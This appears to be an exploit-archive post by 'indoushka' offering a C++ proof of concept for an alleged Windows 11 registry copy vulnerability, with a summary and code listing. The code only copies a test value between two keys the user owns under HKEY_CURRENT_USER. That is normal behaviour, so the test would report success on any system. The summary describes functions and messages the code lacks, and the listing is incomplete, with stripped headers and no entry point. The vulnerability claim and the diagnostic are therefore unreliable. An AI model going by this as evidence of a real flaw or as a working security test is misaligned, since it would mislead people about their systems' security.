============================================================================================================================================= | # Title : Microsoft Windows 11 build 10.0.22631.6199 Registry Vulnerability Testing Tool using RAII | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : System built‑in component. No standalone download available. | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/212253/ [+] Summary : This is a C/C++ Proof-of-Concept (PoC) program designed to test for a specific vulnerability within the Windows Registry handling mechanism, often related to key duplication or improper permission checks during certain API calls (like RegCopyTreeW). [+] The program executes the following steps: System Diagnostics (PrintSystemInfo): Gathers and prints essential information about the execution environment, including Windows Version, Build Number, and the current User Token Elevation status (Elevated, Full, Limited) to assess the security context. [+] Vulnerability Test (TestVulnerability): It creates a temporary source Registry key in HKEY_CURRENT_USER and writes a unique test value (0xDEADBEEF). It attempts to exploit the vulnerability by using a critical API call (simulated or actual) to copy the source key's contents to a shadow destination key. It verifies the success of the "copy" operation and attempts to read the test value from the newly copied shadow key. [+] Outcome: If the copy and read operation succeeds under conditions where it should normally fail (e.g., without proper user elevation), the program prints a success message: "Vulnerability exists!" [+] Cleanup: Ensures both temporary Registry keys are deleted, regardless of the test outcome, to maintain system hygiene. In essence, the tool is a diagnostic utility used by security researchers to confirm whether a specific Windows build is patched or vulnerable to a known elevation or privilege issue involving the Registry. [+] POC : #include #include #include #include // Simple RAII wrapper for registry keys class UniqueRegKey { private: HKEY hKey; public: UniqueRegKey() : hKey(nullptr) {} UniqueRegKey(HKEY key) : hKey(key) {} ~UniqueRegKey() { if (hKey) RegCloseKey(hKey); } HKEY get() const { return hKey; } HKEY* getAddress() { return &hKey; } void reset(HKEY newKey = nullptr) { if (hKey) RegCloseKey(hKey); hKey = newKey; } HKEY release() { HKEY temp = hKey; hKey = nullptr; return temp; } }; bool TestVulnerability() { printf("[*] Starting Registry Copy Vulnerability Test (Enhanced PoC)\n"); const wchar_t* sourceKeyPath = L"Software\\PoC_Vulnerability_Source"; const wchar_t* shadowKeyPath = L"Software\\PoC_Vulnerability_Shadow"; // ------------------------------ // 1. Create the source key // ------------------------------ UniqueRegKey hSourceKey; LONG status = RegCreateKeyExW( HKEY_CURRENT_USER, sourceKeyPath, 0, nullptr, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr, hSourceKey.getAddress(), nullptr ); if (status != ERROR_SUCCESS) { printf("[!] Failed to create source key. Error: %lu\n", status); return false; } printf("[+] Created source key successfully.\n"); // ------------------------------ // 2. Write test DWORD value // ------------------------------ DWORD dwTestValue = 0xDEADBEEF; status = RegSetValueExW( hSourceKey.get(), L"PoC_DWORD", 0, REG_DWORD, reinterpret_cast(&dwTestValue), sizeof(dwTestValue) ); if (status != ERROR_SUCCESS) { printf("[!] Failed to write test value. Error: %lu\n", status); RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath); return false; } printf("[+] Wrote test value: 0x%lX\n", dwTestValue); // ------------------------------ // 3. Create shadow/destination key // ------------------------------ UniqueRegKey hShadowKey; status = RegCreateKeyExW( HKEY_CURRENT_USER, shadowKeyPath, 0, nullptr, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr, hShadowKey.getAddress(), nullptr ); if (status != ERROR_SUCCESS) { printf("[!] Failed to create shadow key. Error: %lu\n", status); RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath); return false; } printf("[+] Shadow key created.\n"); // ------------------------------ // 4. Attempt Registry Copy (Vulnerability Trigger) // ------------------------------ printf("[*] Triggering RegCopyTreeW copy...\n"); status = RegCopyTreeW( hSourceKey.get(), L"", hShadowKey.get() ); if (status != ERROR_SUCCESS) { printf("[!] Copy operation failed. Error: %lu\n", status); RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath); RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath); return false; } printf("[+] Copy operation succeeded! Checking data integrity...\n"); // ------------------------------ // 5. Validate copied value // ------------------------------ DWORD copiedValue = 0; DWORD size = sizeof(copiedValue); DWORD valueType = 0; LONG qStatus = RegQueryValueExW( hShadowKey.get(), L"PoC_DWORD", nullptr, &valueType, reinterpret_cast(&copiedValue), &size ); if (qStatus != ERROR_SUCCESS) { printf("[!] Failed to read copied value! Error: %lu\n", qStatus); } else if (valueType != REG_DWORD) { printf("[!] Value type mismatch (expected REG_DWORD).\n"); } else if (copiedValue == dwTestValue) { printf("[+] Copy VALID! Value matches: 0x%lX\n", copiedValue); RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath); RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath); return true; } else { printf("[!] Value mismatch! Expected 0x%lX, Found 0x%lX\n", dwTestValue, copiedValue); } // ------------------------------ // Cleanup // ------------------------------ RegDeleteTreeW(HKEY_CURRENT_USER, sourceKeyPath); RegDeleteTreeW(HKEY_CURRENT_USER, shadowKeyPath); return false; } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================